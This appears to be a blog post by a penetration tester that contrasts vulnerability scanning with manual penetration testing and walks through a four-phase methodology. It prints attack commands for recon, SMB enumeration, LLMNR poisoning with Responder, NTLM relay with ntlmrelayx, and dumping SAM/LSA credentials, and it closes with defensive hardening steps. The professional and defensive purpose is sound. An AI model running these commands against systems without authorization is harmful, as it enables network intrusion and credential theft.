Last year, I was brought in to assess a mid-size financial firm that had passed three consecutive "penetration tests" from a well-known vendor. Within four hours, I had Domain Admin. The previous assessments had been little more than automated scans with executive summaries stapled on top. That experience reinforced something I tell every client: there is a dangerous gap between what most organizations think a penetration test is and what it actually needs to be.
The Difference Between Vulnerability Scanning and Penetration Testing
Let's be blunt. Running Nessus or Qualys against a subnet and exporting the PDF is not a penetration test. Vulnerability scanning is automated identification of known weaknesses. Penetration testing is the manual, creative exploitation of those weaknesses—chained together—to demonstrate real business impact.
A mature security program needs both, but confusing one for the other leaves you exposed.
| Aspect | Vulnerability Scan | Penetration Test |
|---|---|---|
| Approach | Automated | Manual + Automated |
| Goal | Identify known CVEs | Demonstrate exploitable attack paths |
| Depth | Broad, shallow | Narrow, deep |
| Output | Vulnerability list | Narrative of compromise with evidence |
Structuring Your Assessment: The Four Phases
I follow a methodology rooted in the PTES (Penetration Testing Execution Standard), adapted for enterprise realities.
1. Reconnaissance & Scoping
Before touching a single port, define rules of engagement. Then enumerate. Passive reconnaissance alone often reveals shocking exposure:
# Subdomain enumeration
subfinder -d targetcorp.com -o subdomains.txt
# Search for leaked credentials in public breaches
# (use tools like DeHashed or breach-parse responsibly and within scope)
# Harvest email formats for password spraying
theHarvester -d targetcorp.com -b linkedin -l 2002. Enumeration & Vulnerability Discovery
Once active testing begins, go beyond default scans. Targeted enumeration wins:
# Full TCP scan with service detection and default scripts
nmap -sC -sV -p- -oA full_scan 10.10.10.0/24
# Identify SMB signing disabled (critical for relay attacks)
crackmapexec smb 10.10.10.0/24 --gen-relay-list relay_targets.txt
# Enumerate Active Directory without credentials
enum4linux-ng -A 10.10.10.53. Exploitation & Lateral Movement
This is where methodology separates professionals from script kiddies. A real penetration tester chains findings. For example, LLMNR/NBT-NS poisoning into NTLMv2 relay is still devastatingly effective in most enterprise networks:
# Capture NTLMv2 hashes via LLMNR poisoning
sudo responder -I eth0 -dwP
# Relay captured authentication to targets with SMB signing disabled
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support -iIf you capture a hash, crack it or relay it. If you get local admin on one host, dump credentials and move laterally:
# Dump SAM and LSA from compromised host
crackmapexec smb 10.10.10.20 -u admin -p 'P@ssw0rd' --sam --lsa4. Reporting & Remediation Guidance
The report is the deliverable your stakeholders actually consume. Every finding should include: a clear description, evidence (screenshots, command output), risk rating mapped to business impact, and specific remediation steps—not generic advice.
What Security Administrators Should Do Tomorrow
You don't need to wait for your next external assessment. Start building internal capability:
- Deploy Responder in analyze mode (
-Aflag) on your network to see if LLMNR/NBT-NS is active. If it is, disable it via Group Policy immediately. - Audit SMB signing across your domain. Enforce it. This single change kills an entire class of relay attacks.
- Run BloodHound against your Active Directory to visualize attack paths to Domain Admin before an attacker does:
bloodhound-python -d targetcorp.local -u svc_audit -p 'AuditPass1!' -c All- Establish a regular internal assessment cadence—quarterly at minimum—and rotate between network, application, and Active Directory–focused tests.
Final Thought
Penetration testing isn't about proving you're secure. It's about proving where you're not—before someone with malicious intent does it for you. The organizations that treat assessments as genuine adversary simulations rather than compliance checkboxes are the ones that actually improve their security posture year over year. Be that organization.
Have questions about penetration testing and security assessments? I'm always happy to talk shop — reach out or connect with me on LinkedIn.